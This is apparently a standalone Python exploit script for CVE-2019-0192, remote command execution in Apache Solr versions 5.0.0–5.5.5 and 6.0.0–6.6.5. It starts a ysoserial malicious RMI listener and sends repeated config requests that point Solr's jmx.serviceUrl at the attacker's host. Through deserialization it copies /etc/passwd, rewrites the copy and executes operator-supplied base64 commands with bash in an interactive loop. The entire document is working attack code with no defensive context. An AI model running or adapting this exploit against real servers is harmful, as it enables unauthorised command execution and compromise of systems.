README.md
README.md not found for CVE-2019-0192. The file may not exist in the repository.
import base64
import requests
import subprocess
import signal
import sys
import os
import time
import re
remote = "http://172.18.0.5:8983"
ressource = ""
RHOST = "172.18.0.1"
RPORT = "1099"
proxy = {
}
def exploit(command):
print("\n Run the malicious RMI server using yoserial by running this command:")
print("\n java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21" + command)
if __name__ == "__main__":
print("\nCVE-2019-0192 - Apache Solr RCE 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5\n")
print("[+] Checking if ressource available =>", end=' ')
burp0_url = remote + "/solr/admin/cores?wt=json"
r = requests.get(burp0_url, proxies=proxy, verify=False, allow_redirects=False)
if r.status_code == 200:
if r.json()['status'] == "":
print("KO")
sys.exit()
else:
a = list(r.json()['status'].keys())
ressource = "/solr/" + a[0] + "/config"
print(ressource)
else:
print("KO")
sys.exit()
while True:
try:
command = input("command (\033[92mnot reflected\033[0m)> ")
if command == "exit":
print("Exiting...")
break
command = base64.b64encode(command.encode('utf-8'))
command_str = command.decode('utf-8')
command_str = command_str.replace('/', '+')
pro = subprocess.Popen(
"java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'cp /etc/passwd /tmp/passwd'", stdout=subprocess.PIPE,shell=True, preexec_fn=os.setsid)
print("[+] Copy file to tmp directory =>", end=' ')
burp0_url = remote + ressource
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {
"set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
if r.status_code == 500:
m = re.search('(undeclared checked exception; nested exception is)', r.text)
if m:
print("\033[92mOK\033[0m")
else:
print("\n[-] Error")
os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
sys.exit()
else:
print("KO")
os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
sys.exit()
os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
time.sleep(3)
pro = subprocess.Popen(
"java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'sed -i 1cpwn /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
print("[+] Preparing file =>", end=' ')
burp0_url = remote + ressource
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {
"set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
r = requests.post(
burp0_url, headers=burp0_headers, json=burp0_json)
if r.status_code == 500:
print("\033[92mOK\033[0m")
else:
print("KO")
os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
sys.exit()
os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
time.sleep(3)
pro = subprocess.Popen(
"java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'sed -i /[^pwn]/d /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
print("[+] Cleaning temp file =>", end=' ')
burp0_url = remote + ressource
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {
"set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
r = requests.post(
burp0_url, headers=burp0_headers, json=burp0_json)
if r.status_code == 500:
print("\033[92mOK\033[0m")
else:
print("KO")
os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
sys.exit()
os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
time.sleep(3)
pro = subprocess.Popen(
"java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'sed -i 1s/pwn/{echo," +
command_str + "}|{base64,-d}>pwn.txt/g /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
print("[+] Writing command into temp file =>", end=' ')
burp0_url = remote + ressource
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {
"set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
r = requests.post(
burp0_url, headers=burp0_headers, json=burp0_json)
if r.status_code == 500:
print("\033[92mOK\033[0m")
else:
print("KO")
os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
sys.exit()
os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
time.sleep(3)
pro = subprocess.Popen(
"java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'bash /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
print("[+] Decode base64 command =>", end=' ')
burp0_url = remote + ressource
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {
"set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
r = requests.post(
burp0_url, headers=burp0_headers, json=burp0_json)
if r.status_code == 500:
print("\033[92mOK\033[0m")
else:
print("KO")
os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
sys.exit()
os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
time.sleep(3)
pro = subprocess.Popen(
"java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'bash pwn.txt'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
print("[+] Executing command =>", end=' ')
burp0_url = remote + ressource
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {
"set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
r = requests.post(
burp0_url, headers=burp0_headers, json=burp0_json)
if r.status_code == 500:
print("\033[92mOK\033[0m")
else:
print("KO")
os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
sys.exit()
os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
time.sleep(3)
except KeyboardInterrupt:
print("Exiting...")
break